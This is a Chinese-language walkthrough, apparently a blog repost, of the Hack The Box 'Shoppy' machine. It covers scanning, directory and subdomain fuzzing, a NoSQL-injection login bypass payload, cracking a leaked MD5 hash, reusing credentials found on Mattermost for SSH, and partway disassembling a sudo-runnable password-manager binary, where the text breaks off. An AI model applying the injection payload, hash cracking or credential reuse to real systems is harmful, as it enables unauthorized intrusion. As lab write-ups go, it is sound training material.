Hackthebox - Shoppy 靶场实战
2023-1-20 08:5:10 Author: 路西菲尔的故事汇(查看原文) 阅读量:12 收藏

靶场信息

Nmap

┌──(root㉿kali)-[~/Desktop]
└─# nmap -sS -sV -A -sC -p- --min-rate 5000 10.10.11.180
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-21 20:59 EST
Nmap scan report for 10.10.11.180
Host is up (0.25s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 9e5e8351d99f89ea471a12eb81f922c0 (RSA)
|   256 5857eeeb0650037c8463d7a3415b1ad5 (ECDSA)
|_  256 3e9d0a4290443860b3b62ce9bd9a6754 (ED25519)
80/tcp   open  http     nginx 1.23.1
|_http-title: Did not follow redirect to http://shoppy.htb
|_http-server-header: nginx/1.23.1
9093/tcp open  copycat?
| fingerprint-strings: 
|   GenericLines: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Content-Type: text/plain; version=0.0.4; charset=utf-8
|     Date: Thu, 22 Dec 2022 01:59:42 GMT
|     HELP go_gc_cycles_automatic_gc_cycles_total Count of completed GC cycles generated by the Go runtime.
|     TYPE go_gc_cycles_automatic_gc_cycles_total counter
|     go_gc_cycles_automatic_gc_cycles_total 2612
|     HELP go_gc_cycles_forced_gc_cycles_total Count of completed GC cycles forced by the application.
|     TYPE go_gc_cycles_forced_gc_cycles_total counter
|     go_gc_cycles_forced_gc_cycles_total 0
|     HELP go_gc_cycles_total_gc_cycles_total Count of all completed GC cycles.
|     TYPE go_gc_cycles_total_gc_cycles_total counter
|     go_gc_cycles_total_gc_cycles_total 2612
|     HELP go_gc_duration_seconds A summary of the pause duration of garbage collection cycles.
|     TYPE go_gc_duration_seconds summary
|     go_gc_duration_seconds{quantile="0"} 4.218e-05
|     go_gc_duration_seconds{quantile="0.25"} 0.000107572
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Content-Type: text/plain; version=0.0.4; charset=utf-8
|     Date: Thu, 22 Dec 2022 01:59:43 GMT
|     HELP go_gc_cycles_automatic_gc_cycles_total Count of completed GC cycles generated by the Go runtime.
|     TYPE go_gc_cycles_automatic_gc_cycles_total counter
|     go_gc_cycles_automatic_gc_cycles_total 2612
|     HELP go_gc_cycles_forced_gc_cycles_total Count of completed GC cycles forced by the application.
|     TYPE go_gc_cycles_forced_gc_cycles_total counter
|     go_gc_cycles_forced_gc_cycles_total 0
|     HELP go_gc_cycles_total_gc_cycles_total Count of all completed GC cycles.
|     TYPE go_gc_cycles_total_gc_cycles_total counter
|     go_gc_cycles_total_gc_cycles_total 2612
|     HELP go_gc_duration_seconds A summary of the pause duration of garbage collection cycles.
|     TYPE go_gc_duration_seconds summary
|     go_gc_duration_seconds{quantile="0"} 4.218e-05
|_    go_gc_duration_seconds{quantile="0.25"} 0.000107572
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9093-TCP:V=7.93%I=7%D=12/21%Time=63A3BA0E%P=x86_64-pc-linux-gnu%r(G
SF:enericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20
SF:text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\
SF:x20Request"
)%r(GetRequest,2F0E,"HTTP/1\.0\x20200\x20OK\r\nContent-Type:
SF:\x20text/plain;\x20version=0\.0\.4;\x20charset=utf-8\r\nDate:\x20Thu,\x
SF:2022\x20Dec\x202022\x2001:59:42\x20GMT\r\n\r\n#\x20HELP\x20go_gc_cycles
SF:_automatic_gc_cycles_total\x20Count\x20of\x20completed\x20GC\x20cycles\
SF:x20generated\x20by\x20the\x20Go\x20runtime\.\n#\x20TYPE\x20go_gc_cycles
SF:_automatic_gc_cycles_total\x20counter\ngo_gc_cycles_automatic_gc_cycles
SF:_total\x202612\n#\x20HELP\x20go_gc_cycles_forced_gc_cycles_total\x20Cou
SF:nt\x20of\x20completed\x20GC\x20cycles\x20forced\x20by\x20the\x20applica
SF:tion\.\n#\x20TYPE\x20go_gc_cycles_forced_gc_cycles_total\x20counter\ngo
SF:_gc_cycles_forced_gc_cycles_total\x200\n#\x20HELP\x20go_gc_cycles_total
SF:_gc_cycles_total\x20Count\x20of\x20all\x20completed\x20GC\x20cycles\.\n
SF:#\x20TYPE\x20go_gc_cycles_total_gc_cycles_total\x20counter\ngo_gc_cycle
SF:s_total_gc_cycles_total\x202612\n#\x20HELP\x20go_gc_duration_seconds\x2
SF:0A\x20summary\x20of\x20the\x20pause\x20duration\x20of\x20garbage\x20col
SF:lection\x20cycles\.\n#\x20TYPE\x20go_gc_duration_seconds\x20summary\ngo
SF:_gc_duration_seconds{quantile=\"0\"}\x204\.218e-05\ngo_gc_duration_seco
SF:nds{quantile=\"0\.25\"}\x200\.000107572\ngo_"
)%r(HTTPOptions,2A5A,"HTTP
SF:/1\.0\x20200\x20OK\r\nContent-Type:\x20text/plain;\x20version=0\.0\.4;\
SF:x20charset=utf-8\r\nDate:\x20Thu,\x2022\x20Dec\x202022\x2001:59:43\x20G
SF:MT\r\n\r\n#\x20HELP\x20go_gc_cycles_automatic_gc_cycles_total\x20Count\
SF:x20of\x20completed\x20GC\x20cycles\x20generated\x20by\x20the\x20Go\x20r
SF:untime\.\n#\x20TYPE\x20go_gc_cycles_automatic_gc_cycles_total\x20counte
SF:r\ngo_gc_cycles_automatic_gc_cycles_total\x202612\n#\x20HELP\x20go_gc_c
SF:ycles_forced_gc_cycles_total\x20Count\x20of\x20completed\x20GC\x20cycle
SF:s\x20forced\x20by\x20the\x20application\.\n#\x20TYPE\x20go_gc_cycles_fo
SF:rced_gc_cycles_total\x20counter\ngo_gc_cycles_forced_gc_cycles_total\x2
SF:00\n#\x20HELP\x20go_gc_cycles_total_gc_cycles_total\x20Count\x20of\x20a
SF:ll\x20completed\x20GC\x20cycles\.\n#\x20TYPE\x20go_gc_cycles_total_gc_c
SF:ycles_total\x20counter\ngo_gc_cycles_total_gc_cycles_total\x202612\n#\x
SF:20HELP\x20go_gc_duration_seconds\x20A\x20summary\x20of\x20the\x20pause\
SF:x20duration\x20of\x20garbage\x20collection\x20cycles\.\n#\x20TYPE\x20go
SF:_gc_duration_seconds\x20summary\ngo_gc_duration_seconds{quantile=\"0\"}
SF:\x204\.218e-05\ngo_gc_duration_seconds{quantile=\"0\.25\"}\x200\.000107
SF:572\ngo_"
);
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=12/21%OT=22%CT=1%CU=41733%PV=Y%DS=2%DC=T%G=Y%TM=63A3BA
OS:84%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)OP
OS:S(O1=M539ST11NW7%O2=M539ST11NW7%O3=M539NNT11NW7%O4=M539ST11NW7%O5=M539ST
OS:11NW7%O6=M539ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)EC
OS:N(R=Y%DF=Y%T=40%W=FAF0%O=M539NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%
OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N
OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%C
OS:D=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8080/tcp)
HOP RTT       ADDRESS
1   276.37 ms 10.10.14.1
2   276.85 ms 10.10.11.180

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 150.68 seconds

这里一看就需要做 hosts 解析,我们加进去

echo 10.10.11.180 shoppy.htb >> /etc/hosts

Http

似乎是一个什么倒计时,倒计时到了就会推出一个什么版本,咱们做个信息收集先

Fuzz

┌──(root㉿kali)-[~/Desktop]
└─# ffuf -u "http://shoppy.htb/FUZZ" -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.5.0 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://shoppy.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

css                     [Status: 301, Size: 173, Words: 7, Lines: 11, Duration: 291ms]
admin                   [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 314ms]
images                  [Status: 301, Size: 179, Words: 7, Lines: 11, Duration: 315ms]
js                      [Status: 301, Size: 171, Words: 7, Lines: 11, Duration: 322ms]
login                   [Status: 200, Size: 1074, Words: 152, Lines: 26, Duration: 339ms]
assets                  [Status: 301, Size: 179, Words: 7, Lines: 11, Duration: 278ms]
Admin                   [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 295ms]
Login                   [Status: 200, Size: 1074, Words: 152, Lines: 26, Duration: 295ms]
fonts                   [Status: 301, Size: 177, Words: 7, Lines: 11, Duration: 277ms]
ADMIN                   [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 277ms]
exports                 [Status: 301, Size: 181, Words: 7, Lines: 11, Duration: 279ms]
                        [Status: 200, Size: 2178, Words: 853, Lines: 57, Duration: 279ms]
LOGIN                   [Status: 200, Size: 1074, Words: 152, Lines: 26, Duration: 288ms]
:: Progress: [30000/30000] :: Job [1/1] :: 23 req/sec :: Duration: [0:03:43] :: Errors: 2 ::

经过测试,只有 Login 可以访问,是一个登陆页面

这里可以使用万能密码 admin'||''===' 进行登陆

登入后是一个价格表,右上角有个查询用户的功能

我们查询万能密码后,会得到两个账户

{"_id":"62db0e93d6d6a999a66ee67a","username":"admin","password":"23c6877d9e2b564ef8b32c3a23de27b2"}
{"_id":"62db0e93d6d6a999a66ee67b","username":"josh","password":"6ebcea65320589ca4f2f1ce039975995"}

把 password 提取出来,丢 hashcat 跑一下

echo "6ebcea65320589ca4f2f1ce039975995" > hash

┌──(root㉿kali)-[~/Desktop]
└─# hashcat -m 0 hash /usr/share/wordlists/rockyou.txt       
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 3.0+debian  Linux, None+Asserts, RELOC, LLVM 13.0.1, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: pthread-12th Gen Intel(R) Core(TM) i5-12400F, 1438/2940 MB (512 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

INFO: All hashes found as potfile and/or empty entries! Use --show to display them.

Started: Wed Dec 21 22:07:00 2022
Stopped: Wed Dec 21 22:07:00 2022
                                                                                                                                                                                                                   
┌──(root㉿kali)-[~/Desktop]
└─# hashcat -m 0 hash /usr/share/wordlists/rockyou.txt --show
6ebcea65320589ca4f2f1ce039975995:remembermethisway

这边只有 josh 的账户爆出来了,admin 的无法爆出来

使用这个密码进行 ssh 登陆,是失败的,那就证明还有我们没有发现的地方,这里我们尝试爆破子域名

┌──(root㉿kali)-[~/Desktop]
└─# ffuf -H "Host: FUZZ.shoppy.htb" -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://10.10.11.180 -fs 169

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.5.0 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.11.180
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
 :: Header           : Host: FUZZ.shoppy.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response size: 169
________________________________________________

mattermost              [Status: 200, Size: 3122, Words: 141, Lines: 1, Duration: 266ms]
:: Progress: [100000/100000] :: Job [1/1] :: 150 req/sec :: Duration: [0:11:17] :: Errors: 0 ::

加入到 hosts 解析中

echo 10.10.11.180 mattermost.shoppy.htb >> /etc/hosts

接着去访问一下

是一个登陆界面,用我们刚才破解出来的账号密码去进行登陆

username = josh
password = remembermethisway

登陆成功,到处看一下,做一下信息收集

在 Deploy Machine 中,我们看到 jaeger 发布了一个账号密码

username = jaeger
password = [email protected]!

这似乎是一个用 docker 部署的东西,那应该可以使用 ssh 进行登陆

┌──(root㉿kali)-[~/Desktop]
└─# ssh [email protected] 
[email protected]'s password: 
Linux shoppy 5.10.0-18-amd64 #1 SMP Debian 5.10.140-1 (2022-09-02) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
[email protected]:~$ whoami&&id
jaeger
uid=1000(jaeger) gid=1000(jaeger) groups=1000(jaeger)

登陆成功

[email protected]:~$ cat user.txt 
ff6024ae7ef749b44ac3fbc6ce9df1ce

成功拿到 user 权限的 flag 文件

User

[email protected]:~$ sudo -l
[sudo] password for jaeger: 
Matching Defaults entries for jaeger on shoppy:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jaeger may run the following commands on shoppy:
    (deploy) /home/deploy/password-manager

这里发现一个奇怪的文件,我们想办法给他搞出来在本地分析一下

cd /home/deploy/
python3 -m http.server 1234
┌──(root㉿kali)-[~/Desktop]
└─# wget http://10.10.11.180:1234/password-manager                                  
--2022-12-22 01:34:58--  http://10.10.11.180:1234/password-manager
正在连接 10.10.11.180:1234... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:18440 (18K) [application/octet-stream]
正在保存至: “password-manager”

password-manager                                     100%[=====================================================================================================================>]  18.01K  63.9KB/s  用时 0.3s    

2022-12-22 01:34:59 (63.9 KB/s) - 已保存 “password-manager” [18440/18440])

┌──(root㉿kali)-[~/Desktop]
└─# file password-manager                                                                                    
password-manager: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=400b2ed9d2b4121f9991060f343348080d2905d1, for GNU/Linux 3.2.0, not stripped

这是一个 64 位的可执行文件

┌──(root㉿kali)-[~/Desktop]
└─# r2 password-manager 
Warning: run r2 with -e bin.cache=true to fix relocations in disassembly
[0x00001120]>

使用 r2 分析一下

┌──(root㉿kali)-[~/Desktop]
└─# r2 password-manager 
Warning: run r2 with -e bin.cache=true to fix relocations in disassembly
[0x00001120]> aaa
[x] Analyze all flags starting with sym. and entry0 (aa)
[x] Analyze function calls (aac)
[x] Analyze len bytes of instructions for references (aar)
[x] Finding and parsing C++ vtables (avrr)
[x] Type matching analysis for all functions (aaft)
[x] Propagate noreturn information (aanr)
[x] Use -AA or aaaa to perform additional experimental analysis.
[0x00001120]> afl
0x00001120    1 43           entry0
0x00001150    4 41   -> 34   sym.deregister_tm_clones
0x00001180    4 57   -> 51   sym.register_tm_clones
0x000011c0    5 57   -> 50   sym.__do_global_dtors_aux
0x00001110    1 6            sym.imp.__cxa_finalize
0x00001200    1 5            entry.init0
0x000013eb    4 73           sym.__static_initialization_and_destruction_0_int__int_
0x000010e0    1 6            sym.imp.std::ios_base::Init::Init__
0x00001060    1 6            sym.imp.__cxa_atexit
0x00001434    1 21           sym._GLOBAL__sub_I_main
0x00001000    3 23           sym._init
0x00001205    5 486  -> 426  main
0x000014b4    1 9            sym._fini
0x00001450    4 93           sym.__libc_csu_init
0x000014b0    1 1            sym.__libc_csu_fini
0x00001030    1 6            sym.imp.std::__cxx11::basic_string_char__std::char_traits_char___std::allocator_char___::compare_std::__cxx11::basic_string_char__std::char_traits_char___std::allocator_char____const__const
0x00001040    1 6            fcn.00001040
0x00001050    1 6            sym.imp.system
0x00001070    1 6            sym.imp.std::__cxx11::basic_string_char__std::char_traits_char___std::allocator_char___::operator_char_const_
0x00001080    1 6            sym.imp.std::basic_ostream_char__std::char_traits_char____std::operator____std::char_traits_char____std::basic_ostream_char__std::char_traits_char_____char_const_
0x00001090    1 6            sym.imp.std::ostream::operator___std::ostream____std::ostream__
0x000010a0    1 6            fcn.000010a0
0x000010b0    1 6            sym.imp.std::basic_istream_char__std::char_traits_char____std::operator___char__std::char_traits_char___std::allocator_char____std::basic_istream_char__std::char_traits_char_____std::__cxx11::basic_string_char__std::char_traits_char___std::allocator_char____
0x000010c0    1 6            sym.imp.std::__cxx11::basic_string_char__std::char_traits_char___std::allocator_char___::basic_string_char_const__std::allocator_char__const_
0x000010d0    1 6            sym.imp.std::__cxx11::basic_string_char__std::char_traits_char___std::allocator_char___::basic_string__
0x000010f0    1 6            sym.imp._Unwind_Resume
0x00001100    1 6            sym.imp.std::allocator_char_::allocator__

使用函数 aaa 自动分析并命名函数,使用函数 afl 查看程序内的函数

这里找到了 main 函数,然后去到 main 函数的地址并查看汇编代码

[0x00001120]> s main
[0x00001205]> pdf
            ; DATA XREF from entry0 @ 0x113d
┌ 426: int main (int argc, char **argv, char **envp);
│           ; var int64_t var_60h @ rbp-0x60
│           ; var int64_t var_40h @ rbp-0x40
│           ; var int64_t var_11h @ rbp-0x11
│           ; var int64_t var_8h @ rbp-0x8
│           0x00001205      55             push rbp
│           0x00001206      4889e5         mov rbp, rsp
│           0x00001209      53             push rbx
│           0x0000120a      4883ec58       sub rsp, 0x58
│           0x0000120e      488d35fb0d00.  lea rsi, str.Welcome_to_Josh_password_manager_ ; 0x2010 ; "Welcome to Josh password manager!"
│           0x00001215      488d3da42e00.  lea rdi, obj.std::cout      ; sym..bss
│                                                                      ; 0x40c0                                                                                                                                    
│           0x0000121c      e85ffeffff     call sym std::basic_ostream<char, std::char_traits<char> >& std::operator<< <std::char_traits<char> >(std::basic_ostream<char, std::char_traits<char> >&, char const*) ; sym.imp.std::basic_ostream_char__std::char_traits_char____std::operator____std::char_traits_char____std::basic_ostream_char__std::char_traits_char_____char_const_                                                
│           0x00001221      4889c2         mov rdx, rax
│           0x00001224      488b05a52d00.  mov rax, qword [method.std::basic_ostream_char__std::char_traits_char____std::endl_char__std.char_traits_char____std::basic_ostream_char__std::char_traits_char____] ; [0x3fd0:8]=0                                                                                                                                                                                                        
│           0x0000122b      4889c6         mov rsi, rax
│           0x0000122e      4889d7         mov rdi, rdx
│           0x00001231      e85afeffff     call sym std::ostream::operator<<(std::ostream& (*)(std::ostream&)) ; sym.imp.std::ostream::operator___std::ostream____std::ostream__
│           0x00001236      488d35fb0d00.  lea rsi, str.Please_enter_your_master_password:_ ; 0x2038 ; "Please enter your master password: "
│           0x0000123d      488d3d7c2e00.  lea rdi, obj.std::cout      ; sym..bss
│                                                                      ; 0x40c0                                                                                                                                    
│           0x00001244      e837feffff     call sym std::basic_ostream<char, std::char_traits<char> >& std::operator<< <std::char_traits<char> >(std::basic_ostream<char, std::char_traits<char> >&, char const*) ; sym.imp.std::basic_ostream_char__std::char_traits_char____std::operator____std::char_traits_char____std::basic_ostream_char__std::char_traits_char_____char_const_                                                
│           0x00001249      488d45c0       lea rax, [var_40h]
│           0x0000124d      4889c7         mov rdi, rax
│           0x00001250      e87bfeffff     call sym std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::basic_string() ; sym.imp.std::__cxx11::basic_string_char__std::char_traits_char___std::allocator_char___::basic_string__                                                                                                                                                                         
│           0x00001255      488d45c0       lea rax, [var_40h]
│           0x00001259      4889c6         mov rsi, rax
│           0x0000125c      488d3d7d2f00.  lea rdi, obj.std::cin       ; 0x41e0
│           0x00001263      e848feffff     call sym std::basic_istream<char, std::char_traits<char> >& std::operator>><char, std::char_traits<char>, std::allocator<char> >(std::basic_istream<char, std::char_traits<char> >&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&) ; sym.imp.std::basic_istream_char__std::char_traits_char____std::operator___char__std::char_traits_char___std::allocator_char____std::basic_istream_char__std::char_traits_char_____std::__cxx11::basic_string_char__std::char_traits_char___std::allocator_char____                                                                   
│           0x00001268      488d45ef       lea rax, [var_11h]
│           0x0000126c      4889c7         mov rdi, rax
│           0x0000126f      e88cfeffff     call sym std::allocator<char>::allocator() ; sym.imp.std::allocator_char_::allocator__
│           0x00001274      488d55ef       lea rdx, [var_11h]
│           0x00001278      488d45a0       lea rax, [var_60h]
│           0x0000127c      488d35d90d00.  lea rsi, [0x0000205c]
│           0x00001283      4889c7         mov rdi, rax
│           0x00001286      e835feffff     call sym std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::basic_string(char const*, std::allocator<char> const&) ; sym.imp.std::__cxx11::basic_string_char__std::char_traits_char___std::allocator_char___::basic_string_char_const__std::allocator_char__const_                                                                                           
│           0x0000128b      488d45ef       lea rax, [var_11h]
│           0x0000128f      4889c7         mov rdi, rax
│           0x00001292      e809feffff     call fcn.000010a0
│           0x00001297      488d45a0       lea rax, [var_60h]
│           0x0000129b      488d35bb0d00.  lea rsi, str.Sample         ; 0x205d ; u"Sample"
│           0x000012a2      4889c7         mov rdi, rax
│           0x000012a5      e8c6fdffff     call sym std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::operator+=(char const*) ; sym.imp.std::__cxx11::basic_string_char__std::char_traits_char___std::allocator_char___::operator_char_const_                                                                                                                                                          
│           0x000012aa      488d45a0       lea rax, [var_60h]
│           0x000012ae      488d35aa0d00.  lea rsi, [0x0000205f]       ; u"ample"
│           0x000012b5      4889c7         mov rdi, rax
│           0x000012b8      e8b3fdffff     call sym std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::operator+=(char const*) ; sym.imp.std::__cxx11::basic_string_char__std::char_traits_char___std::allocator_char___::operator_char_const_                                                                                                                                                          
│           0x000012bd      488d45a0       lea rax, [var_60h]
│           0x000012c1      488d35990d00.  lea rsi, [0x00002061]       ; u"mple"
│           0x000012c8      4889c7         mov rdi, rax
│           0x000012cb      e8a0fdffff     call sym std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::operator+=(char const*) ; sym.imp.std::__cxx11::basic_string_char__std::char_traits_char___std::allocator_char___::operator_char_const_                                                                                                                                                          
│           0x000012d0      488d45a0       lea rax, [var_60h]
│           0x000012d4      488d35880d00.  lea rsi, [0x00002063]       ; u"ple"
│           0x000012db      4889c7         mov rdi, rax
│           0x000012de      e88dfdffff     call sym std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::operator+=(char const*) ; sym.imp.std::__cxx11::basic_string_char__std::char_traits_char___std::allocator_char___::operator_char_const_                                                                                                                                                          
│           0x000012e3      488d45a0       lea rax, [var_60h]
│           0x000012e7      488d35770d00.  lea rsi, [0x00002065]       ; u"le"
│           0x000012ee      4889c7         mov rdi, rax
│           0x000012f1      e87afdffff     call sym std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::operator+=(char const*) ; sym.imp.std::__cxx11::basic_string_char__std::char_traits_char___std::allocator_char___::operator_char_const_                                                                                                                                                          
│           0x000012f6      488d45a0       lea rax, [var_60h]
│           0x000012fa      488d35660d00.  lea rsi, [0x00002067]       ; "e"
│           0x00001301      4889c7         mov rdi, rax
│           0x00001304      e867fdffff     call sym std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::operator+=(char const*) ; sym.imp.std::__cxx11::basic_string_char__std::char_traits_char___std::allocator_char___::operator_char_const_                                                                                                                                                          
│           0x00001309      488d55a0       lea rdx, [var_60h]
│           0x0000130d      488d45c0       lea rax, [var_40h]
│           0x00001311      4889d6         mov rsi, rdx
│           0x00001314      4889c7         mov rdi, rax
│           0x00001317      e814fdffff     call sym std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::compare(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) const ; sym.imp.std::__cxx11::basic_string_char__std::char_traits_char___std::allocator_char___::compare_std::__cxx11::basic_string_char__std::char_traits_char___std::allocator_char____const__const                                                                                                                                                                                                               
│           0x0000131c      85c0           test eax, eax
│           0x0000131e      0f94c0         sete al
│           0x00001321      84c0           test al, al
│       ┌─< 0x00001323      743b           je 0x1360
│       │   0x00001325      488d35440d00.  lea rsi, str.Access_granted__Here_is_creds__ ; 0x2070 ; "Access granted! Here is creds !"
│       │   0x0000132c      488d3d8d2d00.  lea rdi, obj.std::cout      ; sym..bss
│       │                                                              ; 0x40c0                                                                                                                                    
│       │   0x00001333      e848fdffff     call sym std::basic_ostream<char, std::char_traits<char> >& std::operator<< <std::char_traits<char> >(std::basic_ostream<char, std::char_traits<char> >&, char const*) ; sym.imp.std::basic_ostream_char__std::char_traits_char____std::operator____std::char_traits_char____std::basic_ostream_char__std::char_traits_char_____char_const_                                                
│       │   0x00001338      4889c2         mov rdx, rax
│       │   0x0000133b      488b058e2c00.  mov rax, qword [method.std::basic_ostream_char__std::char_traits_char____std::endl_char__std.char_traits_char____std::basic_ostream_char__std::char_traits_char____] ; [0x3fd0:8]=0                                                                                                                                                                                                        
│       │   0x00001342      4889c6         mov rsi, rax
│       │   0x00001345      4889d7         mov rdi, rdx
│       │   0x00001348      e843fdffff     call sym std::ostream::operator<<(std::ostream& (*)(std::ostream&)) ; sym.imp.std::ostream::operator___std::ostream____std::ostream__
│       │   0x0000134d      488d3d3c0d00.  lea rdi, str.cat__home_deploy_creds.txt ; 0x2090 ; "cat /home/deploy/creds.txt" ; const char *string
│       │   0x00001354      e8f7fcffff     call sym.imp.system         ; int system(const char *string)
│       │   0x00001359      bb00000000     mov ebx, 0
│      ┌──< 0x0000135e      eb2d           jmp 0x138d
│      ││   ; CODE XREF from main @ 0x1323
│      │└─> 0x00001360      488d35490d00.  lea rsi, str.Access_denied__This_incident_will_be_reported__ ; 0x20b0 ; "Access denied! This incident will be reported !"
│      │    0x00001367      488d3d522d00.  lea rdi, obj.std::cout      ; sym..bss
│      │                                                               ; 0x40c0                                                                                                                                    
│      │    0x0000136e      e80dfdffff     call sym std::basic_ostream<char, std::char_traits<char> >& std::operator<< <std::char_traits<char> >(std::basic_ostream<char, std::char_traits<char> >&, char const*) ; sym.imp.std::basic_ostream_char__std::char_traits_char____std::operator____std::char_traits_char____std::basic_ostream_char__std::char_traits_char_____char_const_                                                
│      │    0x00001373      4889c2         mov rdx, rax
│      │    0x00001376      488b05532c00.  mov rax, qword [method.std::basic_ostream_char__std::char_traits_char____std::endl_char__std.char_traits_char____std::basic_ostream_char__std::char_traits_char____] ; [0x3fd0:8]=0                                                                                                                                                                                                        
│      │    0x0000137d      4889c6         mov rsi, rax
│      │    0x00001380      4889d7         mov rdi, rdx
│      │    0x00001383      e808fdffff     call sym std::ostream::operator<<(std::ostream& (*)(std::ostream&)) ; sym.imp.std::ostream::operator___std::ostream____std::ostream__
│      │    0x00001388      bb01000000     mov ebx, 1
│      │    ; CODE XREF from main @ 0x135e
│      └──> 0x0000138d      488d45a0       lea rax, [var_60h]
│           0x00001391      4889c7         mov rdi, rax
│           0x00001394      e8a7fcffff     call fcn.00001040
│           0x00001399      488d45c0       lea rax, [var_40h]
│           0x0000139d      4889c7         mov rdi, rax
│           0x000013a0      e89bfcffff     call fcn.00001040
│           0x000013a5      89d8           mov eax, ebx
│       ┌─< 0x000013a7      eb3c           jmp 0x13e5
..
      │││   ; CODE XREFS from main @ +0x1b3, +0x1c4
│       │   ; CODE XREF from main @ 0x13a7
│       └─> 0x000013e5      488b5df8       mov rbx, qword [var_8h]
│           0x000013e9      c9             leave
└           0x000013ea      c3             ret

使用函数 s main 定位到 main 函数的地址,使用函数 pdf 查看当前函数的汇编代码

0x0000120e      488d35fb0d00.  lea rsi, str.Welcome_to_Josh_password_manager_ ; 0x2010 ; "Welcome to Josh password manager!"

这是一个 c++ 写的程序,运行程序之后会输出 "Welcome to Josh password manager!" 字符串

0x00001236      488d35fb0d00.  lea rsi, str.Please_enter_your_master_password:_ ; 0x2038 ; "Please enter your master password: "

然后输出 "Please enter your master password:" 字符串,并接受我们的输入

│           0x0000129b      488d35bb0d00.  lea rsi, str.Sample         ; 0x205d ; u"Sample"
│           0x000012a2      4889c7         mov rdi, rax
│           0x000012a5      e8c6fdffff     call sym std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::operator+=(char const*) ; sym.imp.std::__cxx11::basic_string_char__std::char_traits_char___std::allocator_char___::operator_char_const_                                                                                                                                                          
